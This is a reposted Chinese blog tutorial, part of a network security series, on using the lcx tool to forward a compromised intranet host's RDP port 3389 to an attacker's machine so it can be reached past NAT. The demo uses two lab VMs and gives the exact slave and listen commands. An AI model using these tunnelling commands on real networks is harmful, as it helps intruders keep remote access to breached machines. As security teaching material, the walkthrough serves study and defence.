网络安全系列之二 lcx端口转发实现内网突破

内网中的主机一般都是使用私有IP,在网络出口处经过NAT转换为公网IP之后,才能访问Internet。在这种网络结构下,通信双方之间实现的是单向访问,即只有内网中的主机可以主动访问Internet中的主机,反之则不行。如果在内网中架设了一台服务器,又需要允许Internet中的用户访问这台服务器,那么就必须在网络出口处进行端口映射。
在网络攻防中,如果捕获了一台位于内网中的肉鸡,那么黑客是无法主动去连接这台肉鸡的,而且也不可能在人家的网络出口做端口映射,这时就可以用到lcx这个小工具了。下载地址:http://down.51cto.com/data/1878979

Lcx可以实现端口转发,将肉鸡A上的某个端口(如3389)转发到具有公网地址的主机B上,这样黑客只需连接主机B的3389端口就相当于连接到了肉鸡A上,从而突破了内网私有IP的限制。
下面在vmware中利用2台虚拟机来模拟操作,一台虚拟机作为黑客主机(IP地址192.168.80.128),另一台虚拟机作为肉鸡(IP地址192.168.80.129)。
首先将lcx分别放到这两台虚拟机的C盘根目录下,首先在肉鸡上执行命令“lcx –slave 192.168.80.128 5000 192.168.80.129 3389”,也就是将192.168.80.129上的3389端口转发到192.168.80.128上的5000端口。
然后再到黑客主机上执行命令“lcx –listen 5000 3389”,也就是在5000端口上监听,并将收到的数据转发到自己的3389端口上。此时在黑客主机上执行“netstat –an”命令,可以看到同时开放了5000和3389两个端口。
最后在黑客主机上打开mstsc,只需输入自己的IP地址(192.168.80.128或是127.0.0.1)便可以连接到肉鸡上了,从而实现内网突破。


本文转自 yttitan 51CTO博客,原文链接:http://blog.51cto.com/yttitan/1560228

上一篇:0918 每日文献阅读 打卡


下一篇:Spring Boot (初级知识点)(二)